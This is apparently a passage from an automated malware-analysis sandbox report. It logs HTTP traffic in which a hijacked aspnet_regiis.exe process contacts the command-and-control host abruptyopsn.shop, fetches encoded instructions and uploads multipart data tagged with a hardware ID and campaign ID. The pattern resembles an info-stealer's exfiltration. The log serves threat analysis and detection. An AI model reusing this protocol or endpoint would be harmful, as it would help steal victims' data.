                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FeLrPejxIZKkDtCa1sxtyGp3LkuP0XkFb8XhrtdZXRXSEw83dXTtFeWZnOfekhw07X26C9cDHfPN6%2B3ycyZ6Vb%2Bz1VjmMQNT3fQpZpQJcEoKSlcB5P0djP6Aivp%2Fdl0HwDX6"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb52608091a48-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1870&rtt_var=723&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3051&recv_bytes=907&delivery_rate=2234693&cwnd=158&unsent_bytes=0&cid=360cd96a2b469159&ts=21073&x=0"
                                                                                        2024-12-31 16:40:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-31 16:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.649986104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:08 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 54
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:08 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--wcyjskajenao&j=
                                                                                        2024-12-31 16:40:08 UTC1121INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=llj239m6udj44ucbub03gunl2e; expires=Sat, 26 Apr 2025 10:26:47 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alhoXaJiCyOQNZi9%2FzLn9uuWKKF0%2B2U9A2p01mg6o38Di9UAA4HGRVNkM%2BTQRxtJqjlkFQn8AkHosdd45HY8hQAD5aYPEiHtu6pKAFgLgKPOuoxBY1xYxfC5Mg8O9RMdTZcF"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5ac98e072a4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1916&rtt_var=727&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3051&recv_bytes=954&delivery_rate=2242703&cwnd=213&unsent_bytes=0&cid=be80288eee4752e9&ts=463&x=0"
                                                                                        2024-12-31 16:40:08 UTC248INData Raw: 32 64 34 34 0d 0a 58 46 37 69 55 71 77 68 77 54 31 4d 78 55 55 42 79 77 41 71 49 31 4e 76 62 53 50 4b 68 39 32 67 79 54 5a 62 4e 46 69 42 45 6e 73 6e 66 4a 52 77 6c 68 58 74 48 7a 2b 67 5a 7a 75 2f 63 6c 39 47 66 30 30 4d 52 2b 69 39 75 38 47 6c 52 54 34 59 65 76 64 2f 57 57 59 34 67 7a 37 66 52 4f 30 66 4b 62 31 6e 4f 35 42 37 43 45 59 39 54 56 63 42 72 2b 32 2f 77 61 56 55 4f 6c 38 33 38 58 34 59 4e 44 4b 46 4f 73 6c 43 70 56 77 67 71 43 42 6b 72 6d 46 41 54 54 6f 43 42 55 37 6f 71 2f 2f 46 73 78 52 68 46 68 58 6b 5a 68 6f 52 50 35 45 35 6a 6c 7a 74 52 6d 36 67 4b 79 50 78 49 6b 74 47 4d 51 4d 4c 52 36 48 76 74 63 69 74 56 54 39 65 4b 4f 68 30 45 7a 51 38 68 6a 76 44 53 37 46 52 4b 71 38 72 59 71 52 68 43 41 39 78 43 68 63 42 38 4b
                                                                                        Data Ascii: 2d44XF7iUqwhwT1MxUUBywAqI1NvbSPKh92gyTZbNFiBEnsnfJRwlhXtHz+gZzu/cl9Gf00MR+i9u8GlRT4Yevd/WWY4gz7fRO0fKb1nO5B7CEY9TVcBr+2/waVUOl838X4YNDKFOslCpVwgqCBkrmFATToCBU7oq//FsxRhFhXkZhoRP5E5jlztRm6gKyPxIktGMQMLR6HvtcitVT9eKOh0EzQ8hjvDS7FRKq8rYqRhCA9xChcB8K
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 58 73 38 4b 68 46 4b 45 4d 33 38 33 5a 5a 49 58 4b 5a 63 4d 6c 50 34 77 64 75 72 79 74 74 72 47 46 48 52 6a 41 4e 48 55 36 6f 35 72 66 4b 72 31 34 32 57 54 58 74 65 68 34 32 4e 59 63 2f 79 55 75 6c 55 43 33 6e 61 53 4f 75 65 67 67 5a 63 53 30 66 51 71 76 78 73 74 50 72 53 33 64 50 65 75 52 38 57 57 5a 38 68 6a 37 50 54 71 4e 4e 4a 71 77 73 5a 72 74 70 51 55 77 38 44 51 4a 4c 70 2b 61 2f 78 61 46 65 4e 6c 77 2b 37 6e 30 66 50 6a 7a 41 66 6f 35 45 75 78 39 32 35 77 52 6d 75 57 56 45 56 33 4d 33 54 31 37 6d 2f 50 2f 46 70 78 52 68 46 6a 4c 6d 63 78 6f 31 4d 34 4d 34 78 56 47 6a 54 53 69 71 49 6e 47 76 5a 30 5a 4c 4d 68 38 46 54 36 37 6d 74 73 6d 69 55 54 35 53 65 71 30 77 48 69 5a 38 32 48 44 76 54 71 68 54 4a 4c 41 6e 49 37 59 73 55 51 45 32 41 55 38 5a 36
                                                                                        Data Ascii: Xs8KhFKEM383ZZIXKZcMlP4wduryttrGFHRjANHU6o5rfKr142WTXteh42NYc/yUulUC3naSOueggZcS0fQqvxstPrS3dPeuR8WWZ8hj7PTqNNJqwsZrtpQUw8DQJLp+a/xaFeNlw+7n0fPjzAfo5Eux925wRmuWVEV3M3T17m/P/FpxRhFjLmcxo1M4M4xVGjTSiqInGvZ0ZLMh8FT67mtsmiUT5Seq0wHiZ82HDvTqhTJLAnI7YsUQE2AU8Z6
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 72 47 6e 6c 52 49 71 4d 6f 57 52 51 2f 6c 44 50 45 41 5a 5a 63 49 4b 6b 67 64 65 6c 39 42 6c 68 78 43 67 4d 42 38 4b 57 79 77 36 4e 53 4b 31 6b 33 34 48 34 58 4d 54 6d 50 4f 4d 35 44 72 6c 6f 71 72 43 78 67 70 47 5a 61 53 7a 45 46 43 6b 43 69 37 2f 2b 4d 36 31 4d 68 46 6d 4b 6a 51 51 34 31 66 72 55 7a 77 45 32 6b 53 57 36 34 61 58 72 70 5a 55 51 42 61 55 30 43 53 61 33 67 73 4d 4f 68 57 6a 78 63 4e 75 74 2b 47 69 77 7a 68 44 44 43 53 36 6c 53 49 4b 4d 76 61 71 4a 70 54 6b 45 77 42 30 38 50 36 4f 4b 6e 67 76 4d 55 44 56 45 32 37 6e 39 62 43 7a 2b 4f 50 73 6c 56 34 30 42 67 76 6d 64 6b 70 53 49 51 41 54 30 45 44 30 71 69 34 62 2f 46 70 6c 45 36 55 54 6e 75 64 78 4d 77 4f 34 51 38 78 30 36 6c 58 79 6d 6a 49 6e 47 73 61 30 52 4e 63 55 4e 50 52 72 43 6c 35 34
                                                                                        Data Ascii: rGnlRIqMoWRQ/lDPEAZZcIKkgdel9BlhxCgMB8KWyw6NSK1k34H4XMTmPOM5DrloqrCxgpGZaSzEFCkCi7/+M61MhFmKjQQ41frUzwE2kSW64aXrpZUQBaU0CSa3gsMOhWjxcNut+GiwzhDDCS6lSIKMvaqJpTkEwB08P6OKngvMUDVE27n9bCz+OPslV40BgvmdkpSIQAT0ED0qi4b/FplE6UTnudxMwO4Q8x06lXymjInGsa0RNcUNPRrCl54
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 46 6d 4b 6a 65 52 41 73 4d 6f 34 35 77 30 57 72 57 43 43 71 4c 47 57 69 5a 55 39 48 50 41 55 43 52 4b 76 6b 75 38 69 35 56 7a 4a 63 4e 2b 6b 77 56 33 34 37 6d 48 43 57 41 34 52 54 42 37 63 38 63 62 38 69 56 77 38 6f 54 51 68 4e 36 4c 33 2f 77 61 52 64 4e 6c 34 79 37 48 38 64 4d 44 71 47 50 63 74 4d 71 55 30 6d 71 53 70 6f 70 6d 6c 61 51 54 77 4a 41 30 57 67 37 72 57 43 35 52 51 2b 54 6e 71 37 4d 43 77 7a 4d 34 41 7a 32 41 4f 38 45 54 66 6e 49 47 2f 70 4f 67 68 4e 50 77 30 41 54 61 54 75 74 38 4f 6e 57 6a 35 54 4d 2b 74 34 43 7a 38 34 69 44 48 41 54 4b 4a 62 4b 36 49 6a 5a 4b 31 6b 52 77 46 2f 54 51 68 5a 36 4c 33 2f 37 59 78 68 65 33 63 41 6f 32 39 58 4a 33 79 48 50 49 34 62 34 31 4d 74 71 79 39 73 72 32 74 45 53 7a 67 47 41 30 71 73 36 62 62 48 72 56 55
                                                                                        Data Ascii: FmKjeRAsMo45w0WrWCCqLGWiZU9HPAUCRKvku8i5VzJcN+kwV347mHCWA4RTB7c8cb8iVw8oTQhN6L3/waRdNl4y7H8dMDqGPctMqU0mqSpopmlaQTwJA0Wg7rWC5RQ+Tnq7MCwzM4Az2AO8ETfnIG/pOghNPw0ATaTut8OnWj5TM+t4Cz84iDHATKJbK6IjZK1kRwF/TQhZ6L3/7Yxhe3cAo29XJ3yHPI4b41Mtqy9sr2tESzgGA0qs6bbHrVU
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 58 63 51 4c 44 4b 4e 50 38 5a 4c 71 6c 34 71 6f 69 70 6c 70 57 68 4a 52 6a 38 44 42 77 48 6d 70 62 6a 61 36 77 78 35 64 79 72 34 59 67 38 7a 48 59 30 2f 6a 6c 7a 74 52 6d 36 67 4b 79 50 78 49 6b 46 54 4e 51 41 64 53 4b 2f 72 73 4d 47 35 56 54 52 64 4b 4f 52 2f 48 54 6b 77 68 6a 2f 49 51 71 5a 56 49 71 41 69 61 4b 5a 75 43 41 39 78 43 68 63 42 38 4b 57 52 79 62 68 44 4f 6c 67 78 39 57 74 5a 49 58 4b 5a 63 4d 6c 50 34 77 64 75 70 43 78 6f 72 57 4a 45 51 54 55 41 44 31 4f 6e 34 72 6a 4c 6f 45 59 7a 55 54 33 6f 65 42 49 78 4f 70 49 38 77 46 47 6d 54 54 7a 6e 61 53 4f 75 65 67 67 5a 63 54 73 49 55 62 6a 6d 2f 66 4f 39 56 79 39 64 4e 2b 38 77 42 6e 41 6c 77 44 66 43 41 2f 73 66 4b 4b 67 75 59 4b 5a 6a 51 55 30 38 43 41 5a 45 71 65 4f 37 79 4b 46 55 50 31 41 37
                                                                                        Data Ascii: XcQLDKNP8ZLql4qoiplpWhJRj8DBwHmpbja6wx5dyr4Yg8zHY0/jlztRm6gKyPxIkFTNQAdSK/rsMG5VTRdKOR/HTkwhj/IQqZVIqAiaKZuCA9xChcB8KWRybhDOlgx9WtZIXKZcMlP4wdupCxorWJEQTUAD1On4rjLoEYzUT3oeBIxOpI8wFGmTTznaSOueggZcTsIUbjm/fO9Vy9dN+8wBnAlwDfCA/sfKKguYKZjQU08CAZEqeO7yKFUP1A7
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 34 37 6a 48 43 57 41 36 42 59 4c 61 59 74 61 71 56 74 54 30 55 6a 42 77 68 54 71 65 53 30 7a 36 64 55 4e 46 73 77 34 6e 6b 55 4d 6a 47 48 4e 38 46 47 34 78 46 75 6f 44 38 6a 38 53 4a 70 54 44 6f 42 56 42 76 6f 2b 76 48 62 36 31 4d 31 46 6d 4b 6a 63 42 4d 37 4e 6f 30 7a 77 55 43 78 58 69 69 31 4a 32 36 6a 63 45 4a 4b 4e 41 41 43 54 4b 76 6a 75 63 6d 6e 52 6a 42 57 4f 65 67 77 56 33 34 37 6d 48 43 57 41 34 42 49 4f 4b 30 67 62 37 39 70 53 55 49 6e 41 42 38 42 35 71 57 75 78 62 6f 55 59 55 41 71 39 48 63 47 63 43 58 41 4e 38 49 44 2b 78 38 6f 72 69 46 6b 72 32 78 61 52 44 63 43 41 45 69 68 34 62 66 42 71 31 41 39 55 54 2f 67 66 42 49 35 50 34 38 30 78 30 32 71 55 47 37 70 5a 32 53 78 49 68 41 42 45 42 59 4d 54 61 57 6c 6f 49 79 79 46 44 35 61 65 72 73 77 46
                                                                                        Data Ascii: 47jHCWA6BYLaYtaqVtT0UjBwhTqeS0z6dUNFsw4nkUMjGHN8FG4xFuoD8j8SJpTDoBVBvo+vHb61M1FmKjcBM7No0zwUCxXii1J26jcEJKNAACTKvjucmnRjBWOegwV347mHCWA4BIOK0gb79pSUInAB8B5qWuxboUYUAq9HcGcCXAN8ID+x8oriFkr2xaRDcCAEih4bfBq1A9UT/gfBI5P480x02qUG7pZ2SxIhABEBYMTaWloIyyFD5aerswF
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 37 32 45 61 6b 53 57 79 53 4a 47 32 6e 5a 56 34 42 4c 6a 4a 42 41 61 66 2f 2f 35 71 53 54 58 6c 52 4e 71 4d 6f 57 53 73 37 67 44 66 55 56 61 52 54 50 36 77 71 62 34 74 74 54 31 63 79 41 67 78 51 6f 61 6d 30 7a 2b 73 61 65 56 45 69 6f 79 68 5a 45 54 75 57 4d 2b 46 41 73 6c 5a 75 36 57 64 6b 76 79 49 51 41 51 39 4e 48 55 4b 34 35 72 44 54 6c 52 52 68 54 77 53 6a 65 77 38 35 4c 49 4d 6d 78 55 36 76 54 68 44 6e 66 7a 66 37 4d 42 6f 54 59 78 4a 50 58 70 65 72 2f 38 50 72 44 41 42 50 65 76 55 77 51 57 78 79 77 43 4b 4f 47 2b 4d 59 4c 62 55 31 5a 61 70 30 53 77 59 50 4d 79 68 58 6f 75 4b 76 78 62 78 62 65 52 68 36 37 44 42 42 42 33 79 4a 4e 39 56 53 74 56 49 2b 6f 47 64 63 35 79 4a 51 41 57 6c 4e 4f 6b 4b 6d 36 37 6a 55 75 68 6b 65 51 44 44 6b 59 42 34 70 4d 38
                                                                                        Data Ascii: 72EakSWySJG2nZV4BLjJBAaf//5qSTXlRNqMoWSs7gDfUVaRTP6wqb4ttT1cyAgxQoam0z+saeVEioyhZETuWM+FAslZu6WdkvyIQAQ9NHUK45rDTlRRhTwSjew85LIMmxU6vThDnfzf7MBoTYxJPXper/8PrDABPevUwQWxywCKOG+MYLbU1Zap0SwYPMyhXouKvxbxbeRh67DBBB3yJN9VStVI+oGdc5yJQAWlNOkKm67jUuhkeQDDkYB4pM8
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 71 46 4d 6f 71 6a 49 73 75 48 52 4c 56 7a 5a 42 42 31 43 6c 36 66 2f 39 35 52 51 68 46 6d 4b 6a 52 52 6f 77 4d 6f 63 6d 33 77 36 44 56 43 4b 6b 4b 32 4b 75 49 67 59 42 4e 30 31 58 45 75 61 6c 75 39 50 72 44 47 6b 45 59 62 59 6a 54 6d 35 75 6e 33 37 58 41 37 55 66 64 76 56 70 49 37 73 69 45 41 46 32 44 68 31 54 72 75 61 70 77 65 78 71 42 31 63 33 37 44 77 58 4e 54 79 48 49 4e 68 59 37 31 63 74 76 54 31 64 6c 30 6c 45 52 7a 59 58 43 45 65 4f 78 66 2b 4d 36 31 74 35 44 67 4f 6a 4f 46 6b 42 63 73 41 6f 6a 68 76 6a 61 69 32 70 4b 57 53 2f 63 77 56 70 45 6a 63 31 41 34 54 69 71 6f 43 66 55 79 6c 48 4d 65 35 38 57 58 42 38 68 6e 43 57 45 2b 30 66 4b 72 5a 6e 4f 2f 6b 77 45 78 52 69 57 6c 38 54 74 36 75 6d 67 72 30 55 59 51 52 30 6f 32 4a 5a 5a 6e 7a 48 4d 39 78
                                                                                        Data Ascii: qFMoqjIsuHRLVzZBB1Cl6f/95RQhFmKjRRowMocm3w6DVCKkK2KuIgYBN01XEualu9PrDGkEYbYjTm5un37XA7UfdvVpI7siEAF2Dh1TruapwexqB1c37DwXNTyHINhY71ctvT1dl0lERzYXCEeOxf+M61t5DgOjOFkBcsAojhvjai2pKWS/cwVpEjc1A4TiqoCfUylHMe58WXB8hnCWE+0fKrZnO/kwExRiWl8Tt6umgr0UYQR0o2JZZnzHM9x
                                                                                        2024-12-31 16:40:08 UTC1369INData Raw: 4f 64 2f 49 2b 35 73 52 55 41 79 41 77 78 54 75 75 4f 38 31 4b 67 54 42 32 67 66 37 6e 30 63 4d 44 75 2b 44 75 39 4a 73 31 49 68 6f 47 56 44 72 6e 52 4c 66 77 38 36 48 6b 61 34 70 35 6e 42 76 56 64 35 47 48 72 37 4d 45 46 2b 48 59 6f 67 77 30 79 6b 48 51 36 67 4d 57 44 70 4c 41 68 46 63 56 56 50 5a 4b 58 6f 75 73 79 73 46 68 68 63 4b 75 35 2f 48 6e 77 63 68 79 62 4e 41 2b 30 66 49 75 64 2f 49 36 68 6f 57 45 77 2b 43 6b 4e 47 73 75 4c 2f 6a 4f 74 61 65 51 35 36 34 6e 6f 4a 4d 7a 4f 48 66 4d 68 4e 72 52 38 78 36 54 34 6a 76 79 49 51 45 6e 39 4e 48 51 48 77 70 66 6a 42 75 55 59 2f 56 53 7a 67 4e 79 63 41 45 5a 49 33 33 6b 44 68 62 69 4f 6a 4d 58 61 71 63 6b 39 2f 44 79 41 64 52 72 6a 6d 2f 66 4f 39 56 7a 6c 59 50 61 4d 2b 57 53 5a 38 32 48 44 6a 55 61 52 50
                                                                                        Data Ascii: Od/I+5sRUAyAwxTuuO81KgTB2gf7n0cMDu+Du9Js1IhoGVDrnRLfw86Hka4p5nBvVd5GHr7MEF+HYogw0ykHQ6gMWDpLAhFcVVPZKXousysFhhcKu5/HnwchybNA+0fIud/I6hoWEw+CkNGsuL/jOtaeQ564noJMzOHfMhNrR8x6T4jvyIQEn9NHQHwpfjBuUY/VSzgNycAEZI33kDhbiOjMXaqck9/DyAdRrjm/fO9VzlYPaM+WSZ82HDjUaRP


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.649988104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:09 UTC275OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=2MUNY1F2TDR
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12824
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:09 UTC12824OUTData Raw: 2d 2d 32 4d 55 4e 59 31 46 32 54 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 32 4d 55 4e 59 31 46 32 54 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4d 55 4e 59 31 46 32 54 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a 2d 2d 32 4d 55 4e 59 31 46 32 54 44
                                                                                        Data Ascii: --2MUNY1F2TDRContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--2MUNY1F2TDRContent-Disposition: form-data; name="pid"2--2MUNY1F2TDRContent-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao--2MUNY1F2TD
                                                                                        2024-12-31 16:40:10 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=8fh1r6u90lqkbd46o4sqtibpep; expires=Sat, 26 Apr 2025 10:26:48 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2B6jqt7aAw80pxAuki5eITdn9m%2BJmJx2pY0mFqTXcDEjJjbSmkY1DjaIM2BK3%2BqyMMIvh8PCrULpWWjuKdl1p9UvfvZkjLuhwaDpJ1mr9r33ZraOOuSg2jrqj9d5%2FqECXeW5"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5b3cad7de9a-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1655&rtt_var=643&sent=10&recv=17&lost=0&retrans=0&sent_bytes=3053&recv_bytes=13757&delivery_rate=2510028&cwnd=210&unsent_bytes=0&cid=59ff50afc24601da&ts=508&x=0"
                                                                                        2024-12-31 16:40:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:40:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.649989104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:10 UTC273OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=4Z5YHEY2O
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15058
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:10 UTC15058OUTData Raw: 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65
                                                                                        Data Ascii: --4Z5YHEY2OContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--4Z5YHEY2OContent-Disposition: form-data; name="pid"2--4Z5YHEY2OContent-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao--4Z5YHEY2OConte
                                                                                        2024-12-31 16:40:11 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=lcv0lbeuctdvlr2vl0o4mc26o6; expires=Sat, 26 Apr 2025 10:26:50 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FpHr8fNpY%2BZAmfgeIFTtC%2B0aZyMvx12e%2FXqCAH%2BWa2qPjRIybkH3%2F7BaWpofgxxYCDOhrDO%2FK8j%2FiriCutNY4urbaO7J7jsoPRDvw8mMNATqJF%2FOJ2h59jW3gPhbMIJXmeug"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5bb78fe4363-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7383&min_rtt=1637&rtt_var=4179&sent=9&recv=18&lost=0&retrans=0&sent_bytes=3052&recv_bytes=15989&delivery_rate=2675626&cwnd=239&unsent_bytes=0&cid=e7f2e2a59b28f438&ts=530&x=0"
                                                                                        2024-12-31 16:40:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:40:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.649990104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:11 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=AHFIYDV7YKGV8G
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 19946
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:11 UTC15331OUTData Raw: 2d 2d 41 48 46 49 59 44 56 37 59 4b 47 56 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 41 48 46 49 59 44 56 37 59 4b 47 56 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 48 46 49 59 44 56 37 59 4b 47 56 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a 2d 2d 41
